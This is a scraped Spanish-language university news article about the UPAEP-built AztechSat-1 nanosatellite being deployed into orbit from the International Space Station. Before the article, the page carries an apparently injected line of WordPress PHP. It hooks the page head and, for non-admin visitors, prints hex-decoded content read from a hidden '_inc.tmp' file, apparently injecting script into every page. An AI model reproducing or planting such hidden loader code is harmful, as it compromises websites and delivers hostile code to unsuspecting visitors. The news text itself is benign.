if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El AztechSat-1 de la UPAEP ya fue puesto en órbita – La Opinión Universitaria La Opinión Universitaria
Menu

El AztechSat-1 de la UPAEP ya fue puesto en órbita

 

  • Nunca dejen de soñar, dicen estudiantes

Por Diego Cuautle

El nano satélite mexicano AztechSat-1, elaborado por estudiantes y académicos de la Universidad Popular Autónoma del Estado de Puebla (UPAEP) fue lanzado a la órbita de la tierra desde la Estación Espacial Internacional (EEI) con el objetivo de demostrar la intercomunicación entre un nanosatélite y los satélites comerciales.

Minutos antes de las 7 de la mañana de este miércoles, el cubesat único en su tipo inició su viaje que durará aproximadamente 6 meses en los cuales recabará la información necesaria para que sea analizada por los propios estudiantes de la universidad poblana. a una velocidad aproximada de 27 mil kilómetros por hora).

Cabe señalar que en diciembre del 2019, la NASA lanzó el aparato hacia la EEI y es la misma instancia proporcionó asesoramiento técnico para diseñar, construir, probar y operar el satélite, así como las instalaciones para realizar las pruebas ambientales y de calificación para vuelo espacial, y cubrió los costos de su lanzamiento.

Este proyecto tuvo un costo de 600 mil dólares aproximadamente y se logró por las aportaciones y colaboraciones de la NASA, CONACYT, la UPAEP y el Consejo Estatal de Ciencia y Tecnología. Su objetivo será demostrar la intercomunicación entre un nanosatélite y los satélites comerciales.

Durante el lanzamiento, a través de un video, el mexicano originario e Cuernavaca Morelos, Andrés Martínez, y quien actualmente funge como representante de la NASA felicitó a la UPAEP, “con esto arrancamos la nueva era espacial mexicana. Estoy contento por este hito histórico”.

En este sentido, comentó que la barrera más grande es el haber encontrado a una institución que le apostara al futuro, que le apostara con inversión, que le apostara con liderazgo y con todo lo que se requiere.

“Estos proyectos son difíciles, son proyectos caros, estos proyectos no dan producto, no dan resultados que un inversionista pueda ver de un día para otro, aquí se está invirtiendo para el futuro, en capacitar una generación de jóvenes para que estén competentes y que puedan participar en una industria no sólo de nanosatélites”, destacó.

Por su parte, la investigadora de UPAEP, Erika del Carmen Sevilla García, explicó que en el proyecto hay varios estudiantes en dos equipos diferentes de trabajo, con alumnos de las carreras de Ingeniería Mecatrónica, pero también hay estudiantes de Ingeniería Biónica, Automotriz, Mercadotecnia y del área de Cine.

En las últimas horas se dio a conocer que el satélite llegó con éxito a la órbita y se encuentra en buen estado para un iniciar con su objetivo. Los datos se captan en la Global Star y a la Estación Terrena ubicada en los laboratorios de la UPAEP.

Tweets recientes